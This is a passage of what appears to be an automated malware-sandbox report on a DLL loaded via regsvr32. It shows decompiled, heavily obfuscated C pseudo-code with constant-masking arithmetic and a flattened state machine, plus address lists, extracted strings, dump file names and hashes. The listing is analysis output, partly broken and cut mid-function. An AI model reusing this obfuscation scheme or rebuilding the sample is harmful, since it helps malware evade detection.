				_v1252 = _v1252 << 7;
				_v1252 = _v1252 ^ 0x6e0cad01;
				_v1164 = 0x297814;
				_v1164 = _v1164 >> 4;
				_v1164 = _v1164 + 0xad1c;
				_v1164 = _v1164 ^ 0x0003449d;
				_v1128 = 0x9477e9;
				_push(0x25);
				_v1060 = 0;
				_push(0x6b);
				_v1128 = _v1128 / 0;
				_push(0x28);
				_v1128 = _v1128 * 0x78;
				_v1128 = _v1128 ^ 0x01e18498;
				_v1096 = 0x74aee5;
				_v1096 = _v1096 ^ 0x6c90646f;
				_v1096 = _v1096 ^ 0x6ce4ca8a;
				_v1104 = 0xe54da7;
				_v1104 = _v1104 ^ 0x5e57ed35;
				_v1104 = _v1104 ^ 0x5eb2a092;
				_v1156 = 0x7a64ac;
				_v1156 = _v1156 ^ 0x1c77dbd2;
				_v1156 = _v1156 ^ 0xb1776cc0;
				_v1156 = _v1156 ^ 0xad7d20c7;
				_v1124 = 0x72727f;
				_v1124 = _v1124 / 0;
				_v1124 = _v1124 | 0xe951ac1e;
				_v1124 = _v1124 ^ 0xe95a3a8b;
				_v1208 = 0xb227ff;
				_v1208 = _v1208 + 0xfffffba1;
				_push(0x19);
				_v1208 = _v1208 / 0;
				_v1208 = _v1208 + 0x2aa0;
				_v1208 = _v1208 ^ 0x0007b9c6;
				_v1240 = 0xc4fab;
				_v1240 = _v1240 + 0xef12;
				_v1240 = _v1240 * 0x7b;
				_v1240 = _v1240 / 0;
				_v1240 = _v1240 ^ 0x0044601b;
				_v1076 = 0x5aa502;
				_v1076 = _v1076 ^ 0x6aecbd84;
				_v1076 = _v1076 ^ 0x6abfc142;
				_v1152 = 0x55e5e2;
				_t113 =  &_v1152; // 0x55e5e2
				_push(0x16);
				_push(0x41);
				_v1152 =  *_t113 / 0;
				_v1152 = _v1152 + 0x8ec7;
				_v1152 = _v1152 ^ 0x00078e73;
				_v1160 = 0x27979f;
				_v1160 = _v1160 + 0xf248;
				_push(0x78);
				_v1160 = _v1160 * 0x62;
				_v1160 = _v1160 ^ 0x0f821bb0;
				_v1168 = 0xabd608;
				_v1168 = _v1168 + 0xffff850c;
				_v1168 = _v1168 * 0x22;
				_v1168 = _v1168 ^ 0x16cf09ec;
				_v1228 = 0xc9025b;
				_v1228 = _v1228 + 0xffff1976;
				_v1228 = _v1228 << 0xe;
				_v1228 = _v1228 + 0xffff5359;
				_v1228 = _v1228 ^ 0x06fbd3fd;
				_v1136 = 0x3a81fa;
				_v1136 = _v1136 >> 1;
				_v1136 = _v1136 + 0x5656;
				_v1136 = _v1136 ^ 0x00117951;
				_v1212 = 0x7826f9;
				_v1212 = _v1212 << 0xc;
				_v1212 = _v1212 / 0;
				_push(0x27);
				_v1212 = _v1212 * 0xc;
				_v1212 = _v1212 ^ 0x1815ad10;
				_v1220 = 0xd6285d;
				_v1220 = _v1220 / 0;
				_v1220 = _v1220 * 0x2f;
				_v1220 = _v1220 | 0x7b539805;
				_v1220 = _v1220 ^ 0x7b508785;
				_v1144 = 0x1c8208;
				_v1144 = _v1144 + 0xffffeb15;
				_v1144 = _v1144 + 0x727b;
				_v1144 = _v1144 ^ 0x001d0e3d;
				_v1092 = 0xb210ad;
				_v1092 = _v1092 + 0xffff9e19;
				_v1092 = _v1092 ^ 0x00b9f400;
				_v1204 = 0xb5fe9c;
				_v1204 = _v1204 + 0x9482;
				_v1204 = _v1204 | 0x0a96f8ca;
				_v1204 = _v1204 ^ 0xac5d46dd;
				_v1204 = _v1204 ^ 0xa6eb9395;
				_v1100 = 0x43944;
				_v1100 = _v1100 * 0x41;
				_v1100 = _v1100 ^ 0x0118aa25;
				_v1132 = 0xba1204;
				_v1132 = _v1132 / 0;
				_v1132 = _v1132 + 0x38e;
				_v1132 = _v1132 ^ 0x000ade7b;
				_v1068 = 0xbc9a76;
				_v1068 = _v1068 >> 4;
				_v1068 = _v1068 ^ 0x000cb3b0;
				_v1232 = 0xd421f4;
				_v1232 = _v1232 + 0x22f9;
				_v1232 = _v1232 + 0x7e81;
				_v1232 = _v1232 >> 0xc;
				_v1232 = _v1232 ^ 0x0008c428;
				_v1108 = 0x435e53;
				_v1108 = _v1108 >> 7;
				_v1108 = _v1108 ^ 0x000f2537;
				_v1248 = 0xe2b325;
				_v1248 = _v1248 | 0x5b44568d;
				_v1248 = _v1248 << 0xd;
				_push(0x4b);
				_push(0x31);
				_v1248 = _v1248 * 0x1a;
				_v1248 = _v1248 ^ 0xa4fdd99c;
				_v1072 = 0xdacac4;
				_v1072 = _v1072 / 0;
				_v1072 = _v1072 ^ 0x0000fd4a;
				_v1176 = 0xdb602;
				_v1176 = _v1176 + 0xffff6d20;
				_v1176 = _v1176 << 7;
				_v1176 = _v1176 ^ 0x06938184;
				_v1216 = 0x865e5d;
				_v1216 = _v1216 ^ 0x767f6a6f;
				_v1216 = _v1216 + 0xffffd4f0;
				_v1216 = _v1216 + 0x61dd;
				_v1216 = _v1216 ^ 0x76fd6089;
				_v1120 = 0x3f82f1;
				_push(0xb);
				_v1120 = _v1120 / 0;
				_v1120 = _v1120 + 0xffffd1d1;
				_v1120 = _v1120 ^ 0x0008f492;
				_v1184 = 0x7c4510;
				_v1184 = _v1184 + 0xffff78df;
				_v1184 = _v1184 ^ 0x6d7e8832;
				_v1184 = _v1184 ^ 0x6d015da2;
				_v1256 = 0x78f586;
				_v1256 = _v1256 + 0xa035;
				_v1256 = _v1256 << 4;
				_v1256 = _v1256 >> 6;
				_v1256 = _v1256 ^ 0x0013a1d2;
				_v1088 = 0x9fedbc;
				_v1088 = _v1088 + 0xffffa52f;
				_v1088 = _v1088 ^ 0x009c5028;
				_v1224 = 0x58ff94;
				_v1224 = _v1224 | 0x13617714;
				_v1224 = _v1224 * 0xc;
				_v1224 = _v1224 << 1;
				_v1224 = _v1224 ^ 0xd36e5c96;
				_v1140 = 0xde159a;
				_v1140 = _v1140 / 0;
				_v1140 = _v1140 + 0xffff0848;
				_v1140 = _v1140 ^ 0x0016e303;
				_v1064 = 0x3dd261;
				_v1064 = _v1064 + 0xffffc723;
				_v1064 = _v1064 ^ 0x003c26cf;
				_v1148 = 0x195600;
				_v1148 = _v1148 | 0x648f7229;
				_v1148 = _v1148 << 0xe;
				_v1148 = _v1148 ^ 0xdd86b979;
				_v1080 = 0xfc9deb;
				_v1080 = _v1080 | 0x42e1495a;
				_v1080 = _v1080 ^ 0x42f26bf2;
				_v1200 = 0xf3de17;
				_v1200 = _v1200 ^ 0x1fa08573;
				_v1200 = _v1200 + 0xffff4970;
				_v1200 = _v1200 ^ 0x1f52e143;
				_v1236 = 0x6b4876;
				_push(0x3c);
				_t539 = _v1060;
				_v1236 = _v1236 * 0x51;
				_v1236 = _v1236 + 0x13f6;
				_v1236 = _v1236 << 5;
				_v1236 = _v1236 ^ 0x3e440a7d;
				_v1172 = 0xcb8f9;
				_v1172 = _v1172 / 0;
				_v1172 = _v1172 + 0xffff0af3;
				_v1172 = _v1172 ^ 0xfff0cc63;
				_v1244 = 0x76cb4e;
				_v1244 = _v1244 >> 0xa;
				_v1244 = _v1244 >> 0xe;
				_v1244 = _v1244 | 0x2112f403;
				_v1244 = _v1244 ^ 0x21105c80;
				_v1260 = 0xdf486;
				_v1260 = _v1260 << 0xc;
				_v1260 = _v1260 + 0x263e;
				_t380 =  &_v1260; // 0x263e
				_v1260 =  *_t380 * 0x37;
				_v1260 = _v1260 ^ 0xf8970d1a;
				_v1116 = 0x5abdf4;
				_v1116 = _v1116 + 0xffff3e7c;
				_v1116 = _v1116 + 0x32a6;
				_v1116 = _v1116 ^ 0x0057fdad;
				_v1180 = 0xef9510;
				_v1180 = _v1180 >> 0xc;
				_v1180 = _v1180 << 1;
				_v1180 = _v1180 ^ 0x0001619f;
				_v1188 = 0xc0e40d;
				_v1188 = _v1188 >> 2;
				_v1188 = _v1188 >> 0xf;
				_v1188 = _v1188 ^ 0x00045243;
				_v1196 = 0x44984a;
				_v1196 = _v1196 ^ 0xcadae2b7;
				_v1196 = _v1196 ^ 0x72b1898f;
				_v1196 = _v1196 ^ 0xb827a496;
				_v1084 = 0xfdce98;
				_v1084 = _v1084 >> 9;
				_v1084 = _v1084 ^ 0x00056c44;
				while(1) {
					L1:
					_t555 = 0x5c;
					while(1) {
						L2:
						_t518 = 0x75a6dff;
						do {
							L3:
							if(_t601 == 0xdbb6d0) {
								E10003152(_v1180, _v1188, _v1056, _v1196, _v1084);
								_t606 =  &(_t606[3]);
								_t601 = 0x2e9f0ee;
								goto L18;
							} else {
								if(_t601 == 0x23cbada) {
									_push(_v1228);
									_push(_v1168);
									_push(_v1160);
									_t520 = E10004BB4(0x10001230, _v1152);
									_t521 =  *0x10024208; // 0x49d848
									E10011BED(_v1212, __eflags,  &_v520,  &_v1040, _t521 + 0x210, 0x10001230, _t520, _v1220, _v1144,  *0x10024208);
									E1000B9D7(_v1092, _v1204, _t520, _v1100);
									_t606 =  &(_t606[0xd]);
									_t601 = 0x60c7659;
									goto L1;
								} else {
									if(_t601 == 0x60c7659) {
										_t540 =  *0x10024208; // 0x49d848
										_t541 = _t540 + 0x210;
										while(1) {
											__eflags =  *_t541 - _t555;
											if( *_t541 == _t555) {
												break;
											}
											_t541 = _t541 + 2;
											__eflags = _t541;
										}
										_t539 = _t541 + 2;
										_t601 = 0xf2288e9;
										goto L2;
									} else {
										if(_t601 == _t518) {
											_t531 = E10021CAD(_v1236, _t539, _v1172,  &_v1040, _v1244, 2 + E1001ADE9(_v1064, _v1148, _v1080, _v1200,  &_v1040) * 2, _v1056, _v1252, _v1260, _v1116, _v1104);
											_t606 =  &(_t606[0xc]);
											__eflags = _t531;
											_t601 = 0xdbb6d0;
											_v1060 = 0 | _t531 == 0x00000000;
											while(1) {
												L1:
												_t555 = 0x5c;
												goto L2;
											}
										} else {
											if(_t601 == 0xb954f73) {
												E100166C2(_v1156,  &_v520, _v1124, _v1164, _t555, _t555, _v1264, _v1208, _v1240, _v1076);
												_t606 =  &(_t606[8]);
												_t601 = 0x23cbada;
												while(1) {
													L1:
													_t555 = 0x5c;
													L2:
													_t518 = 0x75a6dff;
													goto L3;
												}
											} else {
												if(_t601 == 0xf2288e9) {
													_push(_v1108);
													_push(_v1232);
													_push(_v1068);
													E10003F09(E10004BB4(0x10001290, _v1132), _v1248, _v1112, _v1072, _v1176, _v1216, _v1120, _v1184, 0x10001290, _v1128, 0x10001290, _v1256, _v1096,  &_v1056, _v1192);
													_t601 =  ==  ? 0x75a6dff : 0x2e9f0ee;
													E1000B9D7(_v1088, _v1224, _t534, _v1140);
													_t606 =  &(_t606[0x13]);
													L18:
													_t518 = 0x75a6dff;
													_t555 = 0x5c;
												}
											}
										}
									}
								}
							}
						} while (_t601 != 0x2e9f0ee);
						return _v1060;
					}
				}
			}

0x1001c535
0x1001c53b
0x1001c548
0x1001c551
0x1001c558
0x1001c567
0x1001c56b
0x1001c570
0x1001c578
0x1001c57d
0x1001c585
0x1001c590
0x1001c59b
0x1001c5a6
0x1001c5b1
0x1001c5b9
0x1001c5c1
0x1001c5c9
0x1001c5d1
0x1001c5d9
0x1001c5e1
0x1001c5e9
0x1001c5ee
0x1001c5f6
0x1001c5fe
0x1001c603
0x1001c60b
0x1001c613
0x1001c625
0x1001c627
0x1001c631
0x1001c633
0x1001c645
0x1001c647
0x1001c64e
0x1001c659
0x1001c664
0x1001c66f
0x1001c67a
0x1001c685
0x1001c690
0x1001c69b
0x1001c6a6
0x1001c6b1
0x1001c6bc
0x1001c6c7
0x1001c6dd
0x1001c6e4
0x1001c6ef
0x1001c6fa
0x1001c702
0x1001c711
0x1001c713
0x1001c719
0x1001c721
0x1001c729
0x1001c731
0x1001c73f
0x1001c749
0x1001c74f
0x1001c757
0x1001c762
0x1001c76d
0x1001c778
0x1001c783
0x1001c78a
0x1001c78f
0x1001c791
0x1001c79a
0x1001c7a5
0x1001c7b0
0x1001c7b8
0x1001c7c6
0x1001c7c8
0x1001c7cc
0x1001c7d4
0x1001c7dc
0x1001c7e9
0x1001c7ed
0x1001c7f5
0x1001c7fd
0x1001c805
0x1001c80a
0x1001c812
0x1001c81a
0x1001c825
0x1001c82c
0x1001c837
0x1001c842
0x1001c84a
0x1001c857
0x1001c861
0x1001c863
0x1001c867
0x1001c86f
0x1001c87f
0x1001c889
0x1001c88d
0x1001c895
0x1001c89d
0x1001c8a8
0x1001c8b3
0x1001c8be
0x1001c8c9
0x1001c8d4
0x1001c8df
0x1001c8ea
0x1001c8f2
0x1001c8fa
0x1001c902
0x1001c90a
0x1001c912
0x1001c925
0x1001c92c
0x1001c937
0x1001c94b
0x1001c952
0x1001c95d
0x1001c968
0x1001c973
0x1001c97d
0x1001c988
0x1001c990
0x1001c998
0x1001c9a0
0x1001c9a5
0x1001c9ad
0x1001c9b8
0x1001c9c0
0x1001c9cb
0x1001c9d3
0x1001c9db
0x1001c9e5
0x1001c9e8
0x1001c9ea
0x1001c9ee
0x1001c9f6
0x1001ca0c
0x1001ca13
0x1001ca1e
0x1001ca26
0x1001ca2e
0x1001ca33
0x1001ca3b
0x1001ca43
0x1001ca4b
0x1001ca53
0x1001ca5b
0x1001ca63
0x1001ca78
0x1001ca7a
0x1001ca83
0x1001ca8e
0x1001ca99
0x1001caa1
0x1001caa9
0x1001cab1
0x1001cab9
0x1001cac1
0x1001cac9
0x1001cace
0x1001cad3
0x1001cadb
0x1001cae6
0x1001caf1
0x1001cafc
0x1001cb04
0x1001cb12
0x1001cb16
0x1001cb1a
0x1001cb22
0x1001cb36
0x1001cb3d
0x1001cb48
0x1001cb53
0x1001cb5e
0x1001cb69
0x1001cb74
0x1001cb7f
0x1001cb8a
0x1001cb92
0x1001cb9d
0x1001cba8
0x1001cbb3
0x1001cbbe
0x1001cbc6
0x1001cbce
0x1001cbd8
0x1001cbe5
0x1001cbf2
0x1001cbf5
0x1001cbfc
0x1001cc00
0x1001cc08
0x1001cc0d
0x1001cc15
0x1001cc23
0x1001cc27
0x1001cc2f
0x1001cc37
0x1001cc3f
0x1001cc44
0x1001cc49
0x1001cc51
0x1001cc59
0x1001cc61
0x1001cc66
0x1001cc6e
0x1001cc73
0x1001cc77
0x1001cc7f
0x1001cc8a
0x1001cc95
0x1001cca0
0x1001ccab
0x1001ccb3
0x1001ccb8
0x1001ccbc
0x1001ccc4
0x1001cccc
0x1001ccd1
0x1001ccd6
0x1001ccde
0x1001cce6
0x1001ccee
0x1001ccf6
0x1001ccfe
0x1001cd09
0x1001cd11
0x1001cd1c
0x1001cd1c
0x1001cd1e
0x1001cd1f
0x1001cd1f
0x1001cd1f
0x1001cd24
0x1001cd24
0x1001cd2a
0x1001cf97
0x1001cf9c
0x1001cf9f
0x00000000
0x1001cd30
0x1001cd36
0x1001cef5
0x1001cefe
0x1001cf02
0x1001cf10
0x1001cf2b
0x1001cf53
0x1001cf6b
0x1001cf70
0x1001cf73
0x00000000
0x1001cd3c
0x1001cd42
0x1001ced2
0x1001ced8
0x1001cee3
0x1001cee3
0x1001cee6
0x00000000
0x00000000
0x1001cee0
0x1001cee0
0x1001cee0
0x1001cee8
0x1001ceeb
0x00000000
0x1001cd48
0x1001cd4a
0x1001ceb2
0x1001ceb9
0x1001cebc
0x1001cebe
0x1001cec6
0x1001cd1c
0x1001cd1c
0x1001cd1e
0x00000000
0x1001cd1e
0x1001cd50
0x1001cd56
0x1001ce3c
0x1001ce41
0x1001ce44
0x1001cd1c
0x1001cd1c
0x1001cd1e
0x1001cd1f
0x1001cd1f
0x00000000
0x1001cd1f
0x1001cd5c
0x1001cd62
0x1001cd68
0x1001cd74
0x1001cd78
0x1001cdda
0x1001cdfb
0x1001cdfe
0x1001ce03
0x1001cfa1
0x1001cfa3
0x1001cfa8
0x1001cfa8
0x1001cd62
0x1001cd56
0x1001cd4a
0x1001cd42
0x1001cd36
0x1001cfa9
0x1001cfc2
0x1001cfc2
0x1001cd1f

Strings

ZIB, xrefs: 1001CBA8
VV, xrefs: 1001C82C
7rI, xrefs: 1001C585
S^C, xrefs: 1001C9AD
}D>, xrefs: 1001CC0D
v_, xrefs: 1001C57D
5W^, xrefs: 1001C685
>&v_, xrefs: 1001CC6E
U, xrefs: 1001C783
{r, xrefs: 1001C8B3

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: 5W^$7rI$>&v_$S^C$VV$ZIB$v_${r$}D>$U
API String ID: 1514166925-3159306018
Opcode ID: 04f3e6178ee7b2d75f43e44b62998fcd6e65f9bde9c4eabe89db3e9ef4f8995b
Instruction ID: e61c062d14130fb9a8af1bdfadb8e536b406537feb9ac3fcfc3d59efbe650b8e
Opcode Fuzzy Hash: 04f3e6178ee7b2d75f43e44b62998fcd6e65f9bde9c4eabe89db3e9ef4f8995b
Instruction Fuzzy Hash: 453200725093819FD3A8CF25C94AB8BBBE1FBC4748F10891DE2D986260D7B58949CF13

Uniqueness

Uniqueness Score: -1.00%

Function 1001882F Relevance: 12.9, Strings: 10, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1001882F() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				signed int _v1216;
				signed int _v1220;
				signed int _v1224;
				signed int _v1228;
				void* _t474;
				intOrPtr _t475;
				signed int _t481;
				void* _t482;
				void* _t522;
				signed int _t531;
				intOrPtr _t532;
				intOrPtr* _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				signed int _t540;
				signed int _t541;
				signed int _t542;
				signed int _t543;
				signed int _t544;
				signed int _t545;
				signed int _t546;
				signed int _t549;
				signed int* _t550;
				void* _t553;

				_t550 =  &_v1228;
				_v1068 = 0x3b54d7;
				_v1068 = _v1068 + 0xb32b;
				_t482 = 0xcb429d2;
				_v1068 = _v1068 ^ 0x003c082b;
				_v1212 = 0x9de63b;
				_v1212 = _v1212 ^ 0xaa78d2b6;
				_v1212 = _v1212 * 0x1d;
				_v1212 = _v1212 + 0x97b5;
				_v1212 = _v1212 ^ 0x5bf88b91;
				_v1080 = 0xd46eb4;
				_t534 = 0x42;
				_v1052 = _v1052 & 0x00000000;
				_v1080 = _v1080 * 7;
				_v1080 = _v1080 ^ 0x05cf06ee;
				_v1088 = 0x4e64f3;
				_v1088 = _v1088 + 0xffff6c86;
				_v1088 = _v1088 ^ 0x004dd17b;
				_v1044 = 0x7770a2;
				_v1044 = _v1044 * 0x41;
				_v1044 = _v1044 ^ 0x1e539922;
				_v1192 = 0x63680f;
				_v1192 = _v1192 ^ 0x2f3ce4ac;
				_v1192 = _v1192 << 3;
				_v1192 = _v1192 / _t534;
				_v1192 = _v1192 ^ 0x01dd095a;
				_v1124 = 0x5d3fa6;
				_v1124 = _v1124 >> 0xc;
				_v1124 = _v1124 + 0xb01c;
				_v1124 = _v1124 ^ 0x0000b5ef;
				_v1116 = 0x2b73e;
				_t535 = 0x31;
				_v1116 = _v1116 * 0x5a;
				_v1116 = _v1116 * 0x18;
				_v1116 = _v1116 ^ 0x16e18334;
				_v1180 = 0x18f1f1;
				_v1180 = _v1180 + 0x45e7;
				_v1180 = _v1180 + 0xca0d;
				_v1180 = _v1180 << 7;
				_v1180 = _v1180 ^ 0x0d0a8076;
				_v1188 = 0x9c96a5;
				_v1188 = _v1188 | 0x1da96f23;
				_v1188 = _v1188 ^ 0x236240bb;
				_v1188 = _v1188 ^ 0xc401415d;
				_v1188 = _v1188 ^ 0xfada409e;
				_v1132 = 0x92a751;
				_v1132 = _v1132 / _t535;
				_v1132 = _v1132 << 0x10;
				_v1132 = _v1132 ^ 0xfe3816da;
				_v1140 = 0x71a54f;
				_t536 = 6;
				_v1140 = _v1140 / _t536;
				_v1140 = _v1140 + 0xffff896e;
				_v1140 = _v1140 ^ 0x001b18c5;
				_v1100 = 0xe0908;
				_v1100 = _v1100 ^ 0x483836c1;
				_v1100 = _v1100 ^ 0x483f9e3c;
				_v1108 = 0x5ac33b;
				_v1108 = _v1108 * 9;
				_v1108 = _v1108 ^ 0x03306df6;
				_v1072 = 0x16ffc5;
				_t537 = 0x71;
				_v1072 = _v1072 / _t537;
				_v1072 = _v1072 ^ 0x0009ab17;
				_v1184 = 0x108569;
				_v1184 = _v1184 ^ 0x2e52af5c;
				_v1184 = _v1184 ^ 0xcb57f4e3;
				_t538 = 0x64;
				_v1184 = _v1184 / _t538;
				_v1184 = _v1184 ^ 0x024b18ed;
				_v1168 = 0x6794b1;
				_v1168 = _v1168 | 0x4077a4b1;
				_v1168 = _v1168 + 0xf8ed;
				_t539 = 3;
				_v1168 = _v1168 / _t539;
				_v1168 = _v1168 ^ 0x157123e3;
				_v1084 = 0xf2d511;
				_v1084 = _v1084 + 0xd7d8;
				_v1084 = _v1084 ^ 0x00fb1516;
				_v1092 = 0x5e78c1;
				_v1092 = _v1092 + 0x6a94;
				_v1092 = _v1092 ^ 0x00504a44;
				_v1200 = 0x3ff4fe;
				_v1200 = _v1200 << 0xf;
				_v1200 = _v1200 | 0xc9635158;
				_t540 = 0x50;
				_v1200 = _v1200 / _t540;
				_v1200 = _v1200 ^ 0x03246d2e;
				_v1076 = 0x21040e;
				_v1076 = _v1076 + 0x1277;
				_v1076 = _v1076 ^ 0x002cfbea;
				_v1160 = 0xb8dcc2;
				_v1160 = _v1160 | 0xfc5b9f19;
				_v1160 = _v1160 >> 7;
				_v1160 = _v1160 ^ 0x01ff3b59;
				_v1228 = 0xc41bb;
				_v1228 = _v1228 >> 1;
				_v1228 = _v1228 + 0x1ba1;
				_v1228 = _v1228 + 0x332e;
				_v1228 = _v1228 ^ 0x0009c0f3;
				_v1196 = 0xda7d16;
				_t541 = 0x77;
				_v1196 = _v1196 * 0x45;
				_v1196 = _v1196 + 0xffff976f;
				_v1196 = _v1196 * 0x28;
				_v1196 = _v1196 ^ 0x338dbddc;
				_v1204 = 0x471482;
				_v1204 = _v1204 + 0xfe5d;
				_v1204 = _v1204 >> 0xb;
				_v1204 = _v1204 + 0xffff385b;
				_v1204 = _v1204 ^ 0xfff54157;
				_v1220 = 0x4f2e2;
				_v1220 = _v1220 | 0xd58eda18;
				_v1220 = _v1220 * 0x19;
				_v1220 = _v1220 / _t541;
				_v1220 = _v1220 ^ 0x01df7a21;
				_v1056 = 0xaf858e;
				_v1056 = _v1056 | 0xa4828a2f;
				_v1056 = _v1056 ^ 0xa4a54c81;
				_v1208 = 0xfc2e5b;
				_t542 = 0x27;
				_v1208 = _v1208 / _t542;
				_v1208 = _v1208 + 0xfffff121;
				_t543 = 0x5d;
				_v1208 = _v1208 / _t543;
				_v1208 = _v1208 ^ 0x000ea72e;
				_v1176 = 0xa313c8;
				_v1176 = _v1176 + 0x1be0;
				_v1176 = _v1176 << 6;
				_v1176 = _v1176 << 5;
				_v1176 = _v1176 ^ 0x197cab42;
				_v1048 = 0x1eb649;
				_v1048 = _v1048 >> 0xa;
				_v1048 = _v1048 ^ 0x0007d1cf;
				_v1156 = 0x33b740;
				_v1156 = _v1156 + 0xcc15;
				_v1156 = _v1156 + 0xa8b6;
				_v1156 = _v1156 ^ 0x0034764d;
				_v1136 = 0xcd4a84;
				_v1136 = _v1136 + 0x981e;
				_v1136 = _v1136 + 0xb2b1;
				_v1136 = _v1136 ^ 0x00c53a45;
				_v1216 = 0x45724e;
				_v1216 = _v1216 >> 6;
				_v1216 = _v1216 << 4;
				_v1216 = _v1216 ^ 0x3a3703bb;
				_v1216 = _v1216 ^ 0x3a2d595b;
				_v1128 = 0x3ca53;
				_v1128 = _v1128 + 0x742b;
				_v1128 = _v1128 + 0xffff1624;
				_v1128 = _v1128 ^ 0x0003df76;
				_v1112 = 0x2859ba;
				_v1112 = _v1112 + 0x5ecf;
				_v1112 = _v1112 ^ 0x00270eda;
				_v1096 = 0xbe7bd;
				_v1096 = _v1096 | 0x9e9b8830;
				_v1096 = _v1096 ^ 0x9e9539b1;
				_v1144 = 0x2aed28;
				_t296 =  &_v1144; // 0x2aed28
				_t544 = 0x4a;
				_v1144 =  *_t296 * 0x3e;
				_v1144 = _v1144 | 0x699022bc;
				_v1144 = _v1144 ^ 0x6bf18469;
				_v1064 = 0x98dff6;
				_v1064 = _v1064 + 0x583d;
				_v1064 = _v1064 ^ 0x0093aad2;
				_v1148 = 0xc89935;
				_v1148 = _v1148 / _t544;
				_v1148 = _v1148 ^ 0x5a6ae271;
				_v1148 = _v1148 ^ 0x5a60122d;
				_v1224 = 0x19cc2e;
				_v1224 = _v1224 >> 9;
				_v1224 = _v1224 + 0x73a4;
				_v1224 = _v1224 >> 8;
				_v1224 = _v1224 ^ 0x0001860e;
				_v1120 = 0x2dab8;
				_v1120 = _v1120 + 0xffff2dc1;
				_t545 = 0x51;
				_v1120 = _v1120 / _t545;
				_v1120 = _v1120 ^ 0x000f58d8;
				_v1104 = 0xc60be;
				_v1104 = _v1104 + 0x69e3;
				_v1104 = _v1104 ^ 0x00012c36;
				_v1152 = 0x31fa8e;
				_v1152 = _v1152 | 0xdefdbd7b;
				_v1152 = _v1152 ^ 0xdefc8b5d;
				_v1060 = 0x9b771;
				_v1060 = _v1060 | 0x7b1dc356;
				_v1060 = _v1060 ^ 0x7b163d86;
				_v1164 = 0x5f4c03;
				_t546 = 0x54;
				_t549 = _v1052;
				_t481 = _v1052;
				_t531 = _v1052;
				_v1164 = _v1164 / _t546;
				_v1164 = _v1164 + 0x8948;
				_v1164 = _v1164 << 7;
				_v1164 = _v1164 ^ 0x00dccd19;
				_v1172 = 0x4c1293;
				_v1172 = _v1172 ^ 0x1d43ab1b;
				_v1172 = _v1172 + 0xdf0f;
				_v1172 = _v1172 + 0xfb32;
				_v1172 = _v1172 ^ 0x1d1206a5;
				while(1) {
					L1:
					while(1) {
						_t522 = 0x5c;
						do {
							while(1) {
								L3:
								_t553 = _t482 - 0xca53dd9;
								if(_t553 > 0) {
									break;
								}
								if(_t553 == 0) {
									_t549 = E100040D2(_v1056, _v1080, _t482, _v1208, _t482,  &_v1040, _t531, _v1176, _v1048, _v1156, _t482, _v1088, _v1136, _t482, _v1216, _t531, _v1128, _v1192, _v1112, _v1096, _v1144, _t481, _v1044);
									_t550 =  &(_t550[0x16]);
									__eflags = _t549;
									if(_t549 == 0) {
										goto L15;
									} else {
										_t482 = 0x6d4d19d;
										_v1052 = 1;
										while(1) {
											_t522 = 0x5c;
											goto L3;
										}
									}
								} else {
									if(_t482 == 0x3688f9d) {
										E1001A98E(_v1060, _v1164, _t481, _v1172);
									} else {
										if(_t482 == 0x4e2b8d3) {
											E1001A98E(_v1120, _v1104, _t549, _v1152);
											L15:
											_t482 = 0x3688f9d;
											while(1) {
												_t522 = 0x5c;
												goto L3;
											}
										} else {
											if(_t482 == 0x6d4d19d) {
												E10003511(_v1148, _t481, _t549, _v1224);
												_t550 =  &(_t550[3]);
												_t482 = 0x4e2b8d3;
												while(1) {
													_t522 = 0x5c;
													goto L3;
												}
											} else {
												if(_t482 != 0xc518088) {
													goto L25;
												} else {
													_t532 =  *0x10024208; // 0x49d848
													_t533 = _t532 + 0x210;
													while( *_t533 != _t522) {
														_t533 = _t533 + 2;
														__eflags = _t533;
													}
													_t531 = _t533 + 2;
													_t482 = 0xd8ba225;
													continue;
												}
											}
										}
									}
								}
								L28:
								return _v1052;
							}
							__eflags = _t482 - 0xcb429d2;
							if(_t482 == 0xcb429d2) {
								E100166C2(_v1116,  &_v520, _v1180, _v1124, _t482, _t482, _v1068, _v1188, _v1132, _v1140);
								_t550 =  &(_t550[8]);
								_t482 = 0xedee30a;
								_t522 = 0x5c;
								goto L25;
							} else {
								__eflags = _t482 - 0xd8ba225;
								if(_t482 == 0xd8ba225) {
									_push(_t482);
									_t481 = E100032B5(_v1196, _v1204, _v1212, _t482, _v1220);
									_t550 =  &(_t550[4]);
									__eflags = _t481;
									if(_t481 != 0) {
										_t482 = 0xca53dd9;
										_t522 = 0x5c;
										goto L3;
									}
								} else {
									__eflags = _t482 - 0xedee30a;
									if(_t482 != 0xedee30a) {
										goto L25;
									} else {
										_push(_v1184);
										_push(_v1072);
										_push(_v1108);
										_t474 = E10004BB4(0x10001230, _v1100);
										_t475 =  *0x10024208; // 0x49d848
										E10011BED(_v1084, __eflags,  &_v520,  &_v1040, _t475 + 0x210, 0x10001230, _t474, _v1092, _v1200,  *0x10024208);
										E1000B9D7(_v1076, _v1160, _t474, _v1228);
										_t550 =  &(_t550[0xd]);
										_t482 = 0xc518088;
										goto L1;
									}
								}
							}
							goto L28;
							L25:
							__eflags = _t482 - 0xf14afd2;
